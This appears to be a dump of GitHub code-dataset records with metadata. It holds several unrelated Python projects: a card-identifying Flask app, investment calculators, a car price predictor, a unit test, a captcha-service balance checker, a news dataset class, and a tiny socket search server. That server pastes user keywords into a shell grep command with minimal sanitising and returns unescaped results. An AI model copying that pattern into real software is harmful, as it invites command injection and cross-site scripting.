#this was used when getting the most similar 5 pokemon cards, done locally but not implemented live on site\n listOfSmallestDifsNames = reversed(listOfSmallestDifsNames) #flips array to get most similar first\n listOfSmallestDifsImages = reversed(listOfSmallestDifsImages) #same thing but for images\n '''\n for probableCardName, probableCardImage in zip(listOfSmallestDifsNames, listOfSmallestDifsImages):\n print(f'choice number {probabilityCount} name : {probableCardName} ||'\n f' image : {probableCardImage}')\n probabilityCount += 1\n '''\n readyTorender = True\n return render_template(\"pokemon.html\", content=imageForlikelyPoke, content2=photoPath, readyTorender=readyTorender, pricing=ActualPrices, buyLink=buyCardURL) #updates all the information on the flask application\n\n@app.route(\"/yugioh.html\") #renders yugioh page\ndef yugioh():\n return render_template(\"yugioh.html\")\n\n@app.route(\"/magic.html\") #renders the MTG page\ndef magic():\n return render_template(\"magic.html\")\n\nif __name__ == \"__main__\": #required for running flask application\n app.run()\n", "repo_name": "luke-ichpekov/TradingCardPhoto-identifier-priceCheck", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 12481, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.zeros", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 72, "usage_type": "attribute"}, {"api_name": 
"cv2.getPerspectiveTransform", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.warpPerspective", "line_number": 74, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 83, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 84, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 84, "usage_type": "attribute"}, {"api_name": "numpy.shape", "line_number": 85, "usage_type": "call"}, {"api_name": "cv2.GaussianBlur", "line_number": 88, "usage_type": "call"}, {"api_name": "cv2.threshold", "line_number": 89, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 89, "usage_type": "attribute"}, {"api_name": "cv2.findContours", "line_number": 92, "usage_type": "call"}, {"api_name": "cv2.RETR_LIST", "line_number": 92, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 92, "usage_type": "attribute"}, {"api_name": "cv2.contourArea", "line_number": 96, "usage_type": "call"}, {"api_name": "cv2.contourArea", "line_number": 104, "usage_type": "call"}, {"api_name": "cv2.arcLength", "line_number": 110, "usage_type": "call"}, {"api_name": "cv2.approxPolyDP", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 112, "usage_type": "call"}, {"api_name": "cv2.boundingRect", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 116, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 121, "usage_type": "call"}, {"api_name": "imagehash.phash", "line_number": 122, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 122, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 122, "usage_type": "name"}, {"api_name": "cv2.drawContours", "line_number": 139, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 144, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 145, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 148, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 164, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 168, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 172, "usage_type": "call"}, {"api_name": "flask.request.files", "line_number": 177, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 177, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 181, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 192, "usage_type": "call"}, {"api_name": "json.load", "line_number": 196, "usage_type": "call"}, {"api_name": "imagehash.hex_to_hash", "line_number": 202, "usage_type": "call"}, {"api_name": "imagehash.hex_to_hash", "line_number": 204, "usage_type": "call"}, {"api_name": "imagehash.hex_to_hash", "line_number": 209, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 217, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 250, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 254, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 258, "usage_type": "call"}]} +{"seq_id": "14101645751", "text": "import numpy as np\r\nimport pandas as pd\r\nimport random\r\nfrom itertools import combinations\r\n\r\n# Alguns indices economicos utilizados nos investimentos\r\ncdi_hoje_ano = 11.61\r\ncdi_hoje_mes = 0.92\r\n\r\nipca_hoje_ano = 10.54\r\nipca_hoje_mes = 0.83\r\n\r\nselic_hoje_ano = 11.75\r\n\r\nibov_ano = 
21.19\r\n\r\n# Funcao para retornar os valores de cada investimento\r\n# Obs.: nao foi utilizado nenhuma taxa de imposto para fins de simplificacao\r\ndef valor_final_invest(investmentType, aporte_inicial, aporte_mensal, meses, taxa, benchmark,\r\n cdi_hoje_mes=cdi_hoje_mes, ipca_hoje_mes=ipca_hoje_mes,\r\n cdi_hoje_ano=cdi_hoje_ano, ipca_hoje_ano=ipca_hoje_ano,\r\n selic_hoje_ano=selic_hoje_ano, ibov_hoje_ano=ibov_ano):\r\n valor_final = 0\r\n\r\n # CDB e LCI e LCA\r\n if investmentType == 1 or investmentType == 3 or investmentType == 4:\r\n if benchmark == 'CDI':\r\n juros = 1 + (cdi_hoje_mes * taxa / 100 / 100) # taxa de juros por mês da aplicação\r\n for i in range(meses):\r\n if i == 0:\r\n investimento = aporte_inicial * juros ** (meses)\r\n valor_final = valor_final + investimento\r\n else:\r\n investimento = aporte_mensal * juros ** (meses - i)\r\n valor_final = valor_final + investimento\r\n\r\n # Relacionado a IPCA\r\n if benchmark == 'IPCA':\r\n juros = (1 + (ipca_hoje_ano + taxa) / 100) ** (1 / 12) # taxa de juros por mês da aplicação\r\n for i in range(meses):\r\n if i == 0:\r\n investimento = aporte_inicial * juros ** (meses)\r\n valor_final = valor_final + investimento\r\n else:\r\n investimento = aporte_mensal * juros ** (meses - i)\r\n valor_final = valor_final + investimento\r\n\r\n # Titulo do Tesouro\r\n if investmentType == 5:\r\n\r\n # Relacionado a IPCA\r\n if benchmark == 'IPCA':\r\n juros = (1 + (ipca_hoje_ano + taxa) / 100) ** (1 / 12) # taxa de juros por mês da aplicação\r\n for i in range(meses):\r\n if i == 0:\r\n investimento = aporte_inicial * juros ** (meses)\r\n valor_final = valor_final + investimento\r\n else:\r\n investimento = aporte_mensal * juros ** (meses - i)\r\n valor_final = valor_final + investimento\r\n\r\n # Relacionado a SELIC\r\n if benchmark == 'SELIC':\r\n juros = (1 + (selic_hoje_ano + taxa) / 100) ** (1 / 12) # taxa de juros por mês da aplicação\r\n for i in range(meses):\r\n if i == 0:\r\n investimento = aporte_inicial * juros ** (meses)\r\n valor_final = valor_final + investimento\r\n else:\r\n investimento = aporte_mensal * juros ** (meses - i)\r\n valor_final = valor_final + investimento\r\n\r\n # Relacionado a PRE-FIXADO\r\n if benchmark == 'PRE':\r\n juros = (1 + (taxa / 100)) ** (1 / 12) # taxa de juros por mês da aplicação\r\n for i in range(meses):\r\n if i == 0:\r\n investimento = aporte_inicial * juros ** (meses)\r\n valor_final = valor_final + investimento\r\n else:\r\n investimento = aporte_mensal * juros ** (meses - i)\r\n valor_final = valor_final + investimento\r\n\r\n # Debenture\r\n if investmentType == 6:\r\n\r\n # Relacionado a IPCA\r\n if benchmark == 'IPCA':\r\n juros = (1 + (ipca_hoje_ano + taxa) / 100) ** (1 / 12) # taxa de juros por mês da aplicação\r\n for i in range(meses):\r\n if i == 0:\r\n investimento = aporte_inicial * juros ** (meses)\r\n valor_final = valor_final + investimento\r\n else:\r\n investimento = aporte_mensal * juros ** (meses - i)\r\n valor_final = valor_final + investimento\r\n\r\n # Relacionado a CDI\r\n if benchmark == 'CDI':\r\n juros = (1 + (cdi_hoje_ano + taxa) / 100) ** (1 / 12) # taxa de juros por mês da aplicação\r\n for i in range(meses):\r\n if i == 0:\r\n investimento = aporte_inicial * juros ** (meses)\r\n valor_final = valor_final + investimento\r\n else:\r\n investimento = aporte_mensal * juros ** (meses - i)\r\n valor_final = valor_final + investimento\r\n\r\n # Fundo de Renda Fixa\r\n if investmentType == 10:\r\n\r\n # Relacionado a IPCA\r\n if benchmark == 'IPCA':\r\n juros = 
(1 + (ipca_hoje_ano + taxa) / 100) ** (1 / 12) # taxa de juros por mês da aplicação\r\n for i in range(meses):\r\n if i == 0:\r\n investimento = aporte_inicial * juros ** (meses)\r\n valor_final = valor_final + investimento\r\n else:\r\n investimento = aporte_mensal * juros ** (meses - i)\r\n valor_final = valor_final + investimento\r\n\r\n # Relacionado a CDI\r\n if benchmark == 'CDI':\r\n juros = (1 + (cdi_hoje_ano + taxa) / 100) ** (1 / 12) # taxa de juros por mês da aplicação\r\n for i in range(meses):\r\n if i == 0:\r\n investimento = aporte_inicial * juros ** (meses)\r\n valor_final = valor_final + investimento\r\n else:\r\n investimento = aporte_mensal * juros ** (meses - i)\r\n valor_final = valor_final + investimento\r\n\r\n # Fundo Multimercado\r\n if investmentType == 11:\r\n\r\n # Relacionado a IPCA\r\n if benchmark == 'IPCA':\r\n juros = (1 + (ipca_hoje_ano + taxa) / 100) ** (1 / 12) # taxa de juros por mês da aplicação\r\n for i in range(meses):\r\n if i == 0:\r\n investimento = aporte_inicial * juros ** (meses)\r\n valor_final = valor_final + investimento\r\n else:\r\n investimento = aporte_mensal * juros ** (meses - i)\r\n valor_final = valor_final + investimento\r\n\r\n # Fundo de Renda Variavel\r\n if investmentType == 12:\r\n\r\n # Relacionado a IBOV\r\n if benchmark == 'IBOV':\r\n\r\n juros = (1 + (ibov_hoje_ano + taxa) / 100) ** (1 / 12) # taxa de juros por mês da aplicação\r\n for i in range(meses):\r\n if i == 0:\r\n investimento = aporte_inicial * juros ** (meses)\r\n valor_final = valor_final + investimento\r\n\r\n else:\r\n investimento = aporte_mensal * juros ** (meses - i)\r\n valor_final = valor_final + investimento\r\n\r\n return round(valor_final, 2)\r\n\r\n\r\n# Calculo de toda as combicanocoes possiveis de n investimentos dentro de uma lista de valores\r\ndef combs(lst, n):\r\n return [c for c in combinations(lst, n)], list(combinations(range(len(lst)), n))\r\n\r\n# Realiza a soma de todas as combinacoes acima e retorna qual esta mais perto ou acima do valor target\r\n# Ppontos de melhorias:\r\n# Colocar investimentos ruins na lista de melhor combinação pela soma dos valores chegar mais perto do target\r\n# Possibilidades: colocar ranking de investimentos e utilizar esse fator no erro\r\ndef best_match(lst, target, n):\r\n best = max(combs(lst, n)[0], key=lambda c: ((sum(c) - target), len(c)))\r\n\r\n index_best = combs(lst, n)[0].index(best)\r\n index_true = combs(lst, n)[1][index_best]\r\n return best, index_true\r\n\r\n\r\n# Funcao que retorna os investimentos escolhidos por nós de acordo com os parametros de entrada do cliente\r\n# Pontos de melhorias:\r\n# 1 - Investimentos a serem oferecidos terao o valor de aporte inicial dividido igualmente entre eles\r\ndef best_investments(aporte_inicial, aporte_mensal, meses, target, perfil, df, max=3):\r\n # Realizar o calculo para n elementos de investimento a serem oferecidos e depois checar qual e o melhor\r\n for n in range(max):\r\n # 1 passo: calculo final dos valores de cada investimento\r\n val_invest_fin = []\r\n for j in range(df.shape[0]):\r\n val_invest_fin.append(valor_final_invest(investmentType=df.iloc[j]['investmentType'],\r\n aporte_inicial=aporte_inicial / (n + 1),\r\n aporte_mensal=aporte_mensal / (n + 1), meses=meses,\r\n taxa=df.iloc[j]['Taxas'],\r\n benchmark=df.iloc[j]['Benchmark']))\r\n\r\n # Adiciona uma coluna de valores finais dos investimentos\r\n df_invest_val_fin = df.assign(ValorFinal=val_invest_fin)\r\n\r\n # 2 passo: Filtros\r\n # - dados de acordo com os requisitos do cliente e 
que sejam do Safra:\r\n df_invest_filtered_1 = df_invest_val_fin.loc[(df_invest_val_fin['tempoMin'] <= meses) &\r\n (df_invest_val_fin['valorMin'] <= aporte_inicial / (n + 1)) &\r\n (df_invest_val_fin['Issuer'] == 'Safra')]\r\n\r\n # - retirando investimentos que não estão de acordo com o perfil do investidor:\r\n if perfil == 1:\r\n df_invest_filtered_2 = df_invest_filtered_1.loc[(df_invest_filtered_1['investmentType'] == 1) |\r\n (df_invest_filtered_1['investmentType'] == 3) |\r\n (df_invest_filtered_1['investmentType'] == 4) |\r\n (df_invest_filtered_1['investmentType'] == 5) |\r\n (df_invest_filtered_1['investmentType'] == 10)]\r\n\r\n if perfil == 2:\r\n df_invest_filtered_2 = df_invest_filtered_1.loc[(df_invest_filtered_1['investmentType'] == 1) |\r\n (df_invest_filtered_1['investmentType'] == 3) |\r\n (df_invest_filtered_1['investmentType'] == 4) |\r\n (df_invest_filtered_1['investmentType'] == 5) |\r\n (df_invest_filtered_1['investmentType'] == 6) |\r\n (df_invest_filtered_1['investmentType'] == 10) |\r\n (df_invest_filtered_1['investmentType'] == 11)]\r\n else:\r\n df_invest_filtered_2 = df_invest_filtered_1\r\n\r\n if n + 1 == max:\r\n winner = best_match(df_invest_filtered_2['ValorFinal'], target, n=max)\r\n\r\n list_index = list(winner[1])\r\n\r\n return df_invest_filtered_2.iloc[list_index]\r\n\r\n# Recebe: um df já filtrado com especificacoes de tempo, aporte minimo e investimentos do safra\r\n# Recebe: investimento alvo que se deseja propor outros similares\r\n# Retorna: subset de investimentos similares\r\ndef invest_similar(df, winner, productType, valorFinal, dist=0.01):\r\n range_min = 1 - dist\r\n range_max = 1 + dist\r\n\r\n # Retirar os elementos ja selecionados pelo algoritmo\r\n df = df.drop(list(winner.index), axis=0)\r\n\r\n # Filtrando pelos requisitos\r\n df_similares = df.loc[(df['ValorFinal'] <= valorFinal * range_max) &\r\n (df['ValorFinal'] >= valorFinal * range_min) &\r\n (df['ProductType'] == productType)]\r\n\r\n return df_similares\r\n", "repo_name": "Pesati/Safra-Smart-Invest", "sub_path": "python/utilities.py", "file_name": "utilities.py", "file_ext": "py", "file_size_in_byte": 11804, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "itertools.combinations", "line_number": 169, "usage_type": "call"}]} +{"seq_id": "40628349", "text": "import streamlit as st\nfrom PIL import Image\nimport json\nimport datetime\n\nimport pickle\nmodel = pickle.load(open('model\\\\vehicle_price_predicting_model.pickle','rb'))\n\nwith open(\"model\\columns.json\",'r') as f:\n columns = json.load(f)['vehicle_brand'][1:]\ncurrent_year = datetime.datetime.now().year\n\ndef main():\n title = 'Vehicle Price Predictor'\n st.set_page_config(page_title=title, page_icon=\"🚗\") \n st.title(\"Vehicle Price Predictor 🚘🏍️\")\n\n st.markdown(\"#### Wanna sell your used vehicle!?\\n##### You are at the best place.. 🔮 \")\n img = Image.open('app\\\\4-2-car-png-hd.png')\n st.image(img, width=450)\n\n st.write('')\n st.write('')\n\n st.selectbox('Select the brand of your car', columns)\n\n years = st.number_input('In which year car was purchased ?',2000, current_year, step=1, key ='year')\n Years_old = current_year-years\n\n Present_Price = st.number_input('What is the current ex-showroom price of the car ? 
(In ₹lakhs)',\n 0.00, 50.00, step=0.5, key ='present_price')\n\n Kms_Driven = st.number_input('What is distance completed by the car in Kilometers ?',\n 0.00, 500000.00, step=500.00, key ='drived')\n\n Owner = st.radio(\"The number of owners the car had previously ?\", (0, 1, 3), key='owner')\n\n Fuel_Type_Petrol = st.selectbox('What is the fuel type of the car ?',('Petrol','Diesel', 'CNG'), key='fuel')\n if(Fuel_Type_Petrol=='Petrol'):\n Fuel_Type_Petrol=1\n Fuel_Type_Diesel=0\n elif(Fuel_Type_Petrol=='Diesel'):\n Fuel_Type_Petrol=0\n Fuel_Type_Diesel=1\n else:\n Fuel_Type_Petrol=0\n Fuel_Type_Diesel=0\n\n Seller_Type_Individual = st.selectbox('Are you a dealer or an individual ?', ('Dealer','Individual'), key='dealer')\n if(Seller_Type_Individual=='Individual'):\n Seller_Type_Individual=1\n else:\n Seller_Type_Individual=0\t\n\n Transmission_Manual = st.selectbox('What is the Transmission Type ?', ('Manual','Automatic'), key='manual')\n if(Transmission_Manual=='Manual'):\n Transmission_Manual=1\n else:\n Transmission_Manual=0\n\n if st.button(\"Estimate Price\", key='predict'):\n try:\n Model = model\n prediction = Model.predict([[Present_Price, Kms_Driven, Owner, Years_old,\n Fuel_Type_Diesel, Fuel_Type_Petrol, Seller_Type_Individual, Transmission_Manual]])\n output = round(prediction[0],2)\n if output<0:\n st.warning(\"You will be not able to sell this car !!\")\n else:\n st.success(\"You can sell the car for {} lakhs 🙌\".format(output))\n except:\n st.warning(\"Oops!! Something went wrong\\nTry again\")\n\nif __name__ == '__main__':\n main()", "repo_name": "DarshanJoshi981/VehiclePricePredictor", "sub_path": "app/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2723, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pickle.load", "line_number": 7, "usage_type": "call"}, {"api_name": "json.load", "line_number": 10, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 11, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 11, "usage_type": "attribute"}, {"api_name": "streamlit.set_page_config", "line_number": 15, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 16, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 18, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 19, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 19, "usage_type": "name"}, {"api_name": "streamlit.image", "line_number": 20, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 22, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 23, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 25, "usage_type": "call"}, {"api_name": "streamlit.number_input", "line_number": 27, "usage_type": "call"}, {"api_name": "streamlit.number_input", "line_number": 30, "usage_type": "call"}, {"api_name": "streamlit.number_input", "line_number": 33, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 36, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 38, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 49, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 55, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 61, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 68, "usage_type": "call"}, {"api_name": "streamlit.success", 
"line_number": 70, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "33518028153", "text": "# (c) 2014 The Regents of the University of California. All rights reserved,\n# subject to the license below.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use\n# this file except in compliance with the License. You may obtain a copy of the\n# License at http://www.apache.org/licenses/LICENSE-2.0. Unless required by\n# applicable law or agreed to in writing, software distributed under the License\n# is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the specific language\n# governing permissions and limitations under the License.\n\n'''\nCreated on May 9, 2013\n\n@author: dip\n'''\nimport unittest\nfrom smarter.security.roles.base import BaseRole\nfrom pyramid.security import Allow\nfrom smarter_common.security.constants import RolesConstants\nimport edauth\nfrom edcore.tests.utils.unittest_with_edcore_sqlite import get_unittest_tenant_name,\\\n UnittestEdcoreDBConnection, Unittest_with_edcore_sqlite\nfrom edcore.security.tenant import set_tenant_map\nfrom edauth.tests.test_helper.create_session import create_test_session\nfrom edauth.security.user import RoleRelation\nfrom pyramid.testing import DummyRequest\nfrom pyramid import testing\n\n\nclass TestBase(Unittest_with_edcore_sqlite):\n\n def setUp(self):\n defined_roles = [(Allow, RolesConstants.PII, ('view', 'logout')),\n (Allow, RolesConstants.SAR_EXTRACTS, ('view', 'logout'))]\n edauth.set_roles(defined_roles)\n self.tenant = get_unittest_tenant_name()\n set_tenant_map({self.tenant: \"NC\"})\n dummy_session = create_test_session([RolesConstants.PII])\n dummy_session.set_user_context([RoleRelation(RolesConstants.PII, get_unittest_tenant_name(), \"NC\", \"228\", \"242\"),\n RoleRelation(RolesConstants.SAR_EXTRACTS, get_unittest_tenant_name(), \"NC\", \"228\", \"242\")])\n self.user = dummy_session.get_user()\n self.__request = DummyRequest()\n self.__config = testing.setUp(request=self.__request, hook_zca=False)\n self.__config.testing_securitypolicy(self.user)\n\n def test_check_context(self):\n with UnittestEdcoreDBConnection() as connection:\n base = BaseRole(connection, 'base')\n context = base.check_context(self.tenant, self.user, ['nostudent'])\n self.assertFalse(context)\n\n def test_check_context_with_context(self):\n with UnittestEdcoreDBConnection() as connection:\n base = BaseRole(connection, RolesConstants.PII)\n student_ids = ['e2f3c6a5-e28b-43e8-817b-fc7afed02b9b']\n context = base.check_context(self.tenant, self.user, student_ids)\n self.assertTrue(context)\n\nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.testName']\n unittest.main()\n", "repo_name": "SmarterApp/RDW_DataWarehouse", "sub_path": "smarter/smarter/tests/security/roles/test_base.py", "file_name": "test_base.py", "file_ext": "py", "file_size_in_byte": 2848, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "edcore.tests.utils.unittest_with_edcore_sqlite.Unittest_with_edcore_sqlite", "line_number": 31, "usage_type": "name"}, {"api_name": "pyramid.security.Allow", "line_number": 34, "usage_type": "name"}, {"api_name": "smarter_common.security.constants.RolesConstants.PII", "line_number": 34, "usage_type": "attribute"}, {"api_name": "smarter_common.security.constants.RolesConstants", 
"line_number": 34, "usage_type": "name"}, {"api_name": "pyramid.security.Allow", "line_number": 35, "usage_type": "name"}, {"api_name": "smarter_common.security.constants.RolesConstants.SAR_EXTRACTS", "line_number": 35, "usage_type": "attribute"}, {"api_name": "smarter_common.security.constants.RolesConstants", "line_number": 35, "usage_type": "name"}, {"api_name": "edauth.set_roles", "line_number": 36, "usage_type": "call"}, {"api_name": "edcore.tests.utils.unittest_with_edcore_sqlite.get_unittest_tenant_name", "line_number": 37, "usage_type": "call"}, {"api_name": "edcore.security.tenant.set_tenant_map", "line_number": 38, "usage_type": "call"}, {"api_name": "edauth.tests.test_helper.create_session.create_test_session", "line_number": 39, "usage_type": "call"}, {"api_name": "smarter_common.security.constants.RolesConstants.PII", "line_number": 39, "usage_type": "attribute"}, {"api_name": "smarter_common.security.constants.RolesConstants", "line_number": 39, "usage_type": "name"}, {"api_name": "edauth.security.user.RoleRelation", "line_number": 40, "usage_type": "call"}, {"api_name": "smarter_common.security.constants.RolesConstants.PII", "line_number": 40, "usage_type": "attribute"}, {"api_name": "smarter_common.security.constants.RolesConstants", "line_number": 40, "usage_type": "name"}, {"api_name": "edcore.tests.utils.unittest_with_edcore_sqlite.get_unittest_tenant_name", "line_number": 40, "usage_type": "call"}, {"api_name": "edauth.security.user.RoleRelation", "line_number": 41, "usage_type": "call"}, {"api_name": "smarter_common.security.constants.RolesConstants.SAR_EXTRACTS", "line_number": 41, "usage_type": "attribute"}, {"api_name": "smarter_common.security.constants.RolesConstants", "line_number": 41, "usage_type": "name"}, {"api_name": "edcore.tests.utils.unittest_with_edcore_sqlite.get_unittest_tenant_name", "line_number": 41, "usage_type": "call"}, {"api_name": "pyramid.testing.DummyRequest", "line_number": 43, "usage_type": "call"}, {"api_name": "pyramid.testing.setUp", "line_number": 44, "usage_type": "call"}, {"api_name": "pyramid.testing", "line_number": 44, "usage_type": "name"}, {"api_name": "edcore.tests.utils.unittest_with_edcore_sqlite.UnittestEdcoreDBConnection", "line_number": 48, "usage_type": "call"}, {"api_name": "smarter.security.roles.base.BaseRole", "line_number": 49, "usage_type": "call"}, {"api_name": "edcore.tests.utils.unittest_with_edcore_sqlite.UnittestEdcoreDBConnection", "line_number": 54, "usage_type": "call"}, {"api_name": "smarter.security.roles.base.BaseRole", "line_number": 55, "usage_type": "call"}, {"api_name": "smarter_common.security.constants.RolesConstants.PII", "line_number": 55, "usage_type": "attribute"}, {"api_name": "smarter_common.security.constants.RolesConstants", "line_number": 55, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "27661446125", "text": "from subprocess import getoutput\nfrom _thread import start_new_thread as thread\nfrom re import search\nfrom base64 import b64decode\nfrom json import loads, dumps\nfrom socket import socket\n\n\nwith open('./public/index.html') as file:\n index = file.read()\n\n\ndef search_results(keywords):\n # note results are not output encoded. 
The client must sanitise the output.\n return [*map(loads, getoutput(f'grep -m 15 -iwE \\'{\" \".join(keywords).replace(chr(0x27), chr(0x20))}\\' ./index.lst').split('\\n'))]\n\n\ndef listen():\n s = socket()\n s.bind(('', 80))\n s.listen(5)\n\n while 1:\n try:\n client, _ = s.accept()\n thread(app, (client,))\n print(f'serviced connection from {_}')\n except:\n s.close()\n\n\ndef app(client):\n try:\n message = str(client.recv(4096), 'utf-8')\n\n if '@' in message:\n query_enc = search('@([a-zA-Z0-9\\+\\-=]+)@', message).group(1)\n keywords = loads(b64decode(query_enc))\n\n if type(keywords) == type([]):\n reply = dumps(search_results(keywords))\n mime = 'application/json'\n else:\n reply = index\n mime = 'text/html'\n\n except:\n reply = 'sorry, something inside me glitched'\n mime = 'text/plain'\n\n client.send(bytes(f'HTTP/1.1 200 OK\\r\\n{mime}\\r\\n\\r\\n{reply}\\r\\n\\r\\n\\r\\n', 'utf-8'))\n client.close()\n\n\nlisten()\n", "repo_name": "oelin/carrot", "sub_path": "src/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1297, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.loads", "line_number": 15, "usage_type": "argument"}, {"api_name": "subprocess.getoutput", "line_number": 15, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 19, "usage_type": "call"}, {"api_name": "_thread.start_new_thread", "line_number": 26, "usage_type": "call"}, {"api_name": "re.search", "line_number": 37, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 38, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 38, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "10622590697", "text": "import time\r\nimport capsolver\r\nimport os\r\n\r\nwhile True:\r\n capsolver.api_key = input(\"Enter your Capsolver API key: \")\r\n try:\r\n balance_response = capsolver.balance()\r\n if balance_response is not None and 'balance' in balance_response:\r\n balance = balance_response['balance']\r\n break\r\n except:\r\n print(\"Incorrect API key. Please try again.\")\r\n\r\nprint(f\"Press Enter to refresh your balance.\\n You currently have ${balance:.3f}\")\r\n\r\nwhile True:\r\n command = input()\r\n if command.lower() == \"quit\":\r\n break\r\n elif command == \"\":\r\n print(\"Refreshing balance\", end=\"\", flush=True)\r\n for _ in range(6):\r\n time.sleep(0.1)\r\n print(\".\", end=\"\", flush=True)\r\n print()\r\n os.system(\"cls\" if os.name == \"nt\" else \"clear\")\r\n try:\r\n balance_response = capsolver.balance()\r\n if balance_response is not None and 'balance' in balance_response:\r\n balance = balance_response['balance']\r\n print(f\"Your balance is: {balance:.3f}\")\r\n else:\r\n print(\"Failed to get balance.\")\r\n except:\r\n print(\"Incorrect API key. 
Please try again.\")\r\n print(\"Press Enter to refresh the balance\")\r\n else:\r\n print(\"Invalid command.\")\r\n", "repo_name": "ExamV1/capsolverbalancechecker", "sub_path": "CapSolverBalanceChecker.py", "file_name": "CapSolverBalanceChecker.py", "file_ext": "py", "file_size_in_byte": 1328, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "capsolver.api_key", "line_number": 6, "usage_type": "attribute"}, {"api_name": "capsolver.balance", "line_number": 8, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 24, "usage_type": "call"}, {"api_name": "os.system", "line_number": 27, "usage_type": "call"}, {"api_name": "os.name", "line_number": 27, "usage_type": "attribute"}, {"api_name": "capsolver.balance", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "18940974643", "text": "import itertools\nfrom dataclasses import dataclass\nfrom typing import Any, Dict, List, Tuple\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom manner.data.components.mind_batch import MINDNewsBatch\nfrom manner.data.components.adressa_dataframe import AdressaDataFrame\nfrom transformers import PreTrainedTokenizer\n\n\nclass AdressaNewsDataset(AdressaDataFrame):\n def __init__(self, news: pd.DataFrame, behaviors: pd.DataFrame, aspect: str) -> None:\n news_ids = np.array(\n list(\n set(\n list(itertools.chain.from_iterable(behaviors.history))\n + list(itertools.chain.from_iterable(behaviors.candidates))\n )\n )\n )\n\n self.news = news.loc[news_ids]\n self.labels = np.array(self.news[aspect + \"_label\"])\n\n def __getitem__(self, idx: Any) -> Tuple[pd.DataFrame, int]:\n news = self.news.iloc[[idx]]\n label = self.labels[idx]\n\n return news, label\n\n def __len__(self) -> int:\n return len(self.news)\n\n\n@dataclass\nclass AdressaCollate:\n def __init__(\n self, \n tokenizer: PreTrainedTokenizer\n ) -> None:\n self.tokenizer = tokenizer\n\n def __call__(self, batch) -> MINDNewsBatch:\n news, labels = zip(*batch)\n\n transformed_news = self._tokenize_df(pd.concat(news))\n labels = torch.tensor(labels).long()\n\n return MINDNewsBatch(news=transformed_news, labels=labels)\n\n def 